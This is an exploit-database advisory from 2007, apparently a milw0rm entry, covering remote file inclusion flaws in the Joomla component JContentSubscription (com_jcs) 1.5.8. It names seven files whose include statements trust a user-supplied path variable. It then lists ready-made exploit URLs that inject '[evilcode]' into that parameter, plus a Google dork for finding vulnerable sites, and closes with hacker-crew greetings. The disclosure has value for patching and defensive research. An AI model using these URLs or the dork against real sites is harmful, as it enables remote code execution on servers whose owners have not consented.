Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusions



EKU-ID: 12463 CVE: OSVDB-43627;CVE-2007-5407;OSVDB-43624;OSVDB-43623;OSVDB-43622;OSVDB-43621;OSVDB-43620;OSVDB-43619 OSVDB-ID:
Author: NoGe Published: 2007-10-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

   Component    : com_jcs version 1.5.8 - payable component
   Dicovered by : NoGe
   Contact      : pace.noge@hotmail.com

==================================================================================================================================

# Vulnerable file

   /administrator/components/com_jcs/jcs.function.php

   line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/add.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/history.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/register.php

   line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/views/list.sub.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/list.user.sub.html.php

   line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/reports.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

# Exploit

   http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

# Google dork

   inurl:com_jcs

==================================================================================================================================

# Greetz

   all crew #papuahacker #baliemhackerlink #nyubicrew
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
   http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-10-10]